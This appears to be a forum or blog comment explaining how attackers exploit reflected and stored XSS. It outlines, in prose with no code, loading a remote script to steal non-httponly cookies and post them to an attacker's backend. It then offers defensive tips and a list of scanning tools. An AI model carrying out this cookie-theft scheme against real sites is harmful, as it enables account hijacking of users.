What an attacker can gain with viewing that the xss attack vector he found works, is just that 🙂 But! Then he can use that attack vector, and there are several ways to do that.

If it’s a non-persistent XSS vulnerability (aka reflected), then probably by sending a link (most probably obfuscated via a urlshortener) to potential victims.
If it’s a persistent XSS vulnerability (i.e. stored as a comment like the one I’m writing now), then he would just make his post and wait.

Now, what he can gain is a big talk. Just think what you could do if you could inject a script tag into a web page. You could then load a whole javascript file from your server.

The malicious code would then steal some cookies perhaps (if those are not set httponly) and immediately post them via ajax to a backend application..which would probably notify the attacker and who knows..those cookies might be enough to login into that website as the victim.

Well..there are many things an attacker can do..so please eliminate all XSS vulnerabilities you might have.

XSS vulnerabilities mainly take advantage of the trust people have in other websites.
Don’t underestimate the XSRF vulnerabilities which depend on the trust a website has on your browser (another big talk), and Sql Injection attacks.

A few tips (I’m sure you know all about it but for the sake of completeness:

• set httponly in cookies you use to authenticate users
• use htmlentities when printing user input back to your output
• use mysql_real_escape_string before storing user input into your db
• do not perform critical actions (i.e. save/delete/modify articles) using GET requests..use POST for those (xsrf).

Good luck!

UPDATE:

A few tools that can help:

• Chrome plugin : Websecurify
• Firefox Plugin: xss-me
• Windows App: NetSparker Community Edition (free)
• X-platrofm: SkipFish , wapiti
• Nessus

(I recommend SkipFish)